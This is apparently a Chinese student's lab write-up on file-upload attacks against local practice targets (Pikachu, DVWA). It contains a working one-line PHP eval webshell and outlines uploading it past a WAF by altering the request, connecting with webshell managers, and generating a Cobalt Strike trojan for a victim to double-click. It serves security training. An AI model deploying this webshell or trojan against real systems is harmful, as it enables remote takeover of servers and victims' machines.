文件上传WAF绕过实战:一句话木马编写、webshell连接与CS木马攻击
文件上传WAF绕过实战:一句话木马编写、webshell连接与CS木马攻击
一句话木马的编写
<?php @eval($_POST['cmd']);phpinfo();?>
webshell的连接工具
如何连接webshell
第一步:上传木马文件到目标服务器中
第二步:需要访问木马
第三步:连接木马文件
第四步:shell管理
实验测试
2003的导入虚拟机
写木马文件
访问木马
连接木马
哥斯拉的使用
ladon扫描器
文件上传
http://172.20.69.110/pikachu/
http://172.20.69.110/dvwa/login.php
http://172.20.69.110/sqlit/
http://172.20.69.110/
http://172.20.69.110/phpmyadmin/
http://172.20.69.110/ekucms2.5/
第一步:确定目标地址
http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/servercheck.php
第二步:尝试上传文件
http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/uploads/shell.jpg
第三步:抓取上传数据包
第四步:更改数据包
第五步:访问目标
第六步:shell连接
CS的工具
工具下载
启动工具
第一步:打开cs的客户端
第二步:部署服务器端
任务:打开cs.bat
cs木马生成
第一步:设置监听器
第二步:设置cs马
第三步:让被攻击者运行此文件,受害主机上线(双击)
第四步:使用插件增强
实验心得与总结
本次实验主要学习了文件上传漏洞的利用,包括一句话木马的编写和连接,以及使用哥斯拉和Ladon进行扫描和利用CS木马进行攻击。在实验中,我们学习了如何通过抓包并修改数据包来绕过WAF的检测,同时也需要注意目标系统的防御措施,例如上传类型的限制等。连接木马时,需要使用webshell连接工具进行连接和管理。
同时,本次实验还学习了CS木马的生成和使用,需要设置监听器和CS马,并让被攻击者运行此文件,受害主机上线。可以使用插件增强CS木马的功能,实现更多的攻击和控制操作。
总的来说,本次实验对于提高网络安全意识和技能有很大的帮助,通过实践操作,深入理解了文件上传漏洞和木马攻击的原理和方法。在实际工作和学习中,需要不断学习和研究最新的安全技术和攻击手段,以提高系统的安全性。
原文地址: https://www.cveoy.top/t/topic/oYdM 著作权归作者所有。请勿转载和采集!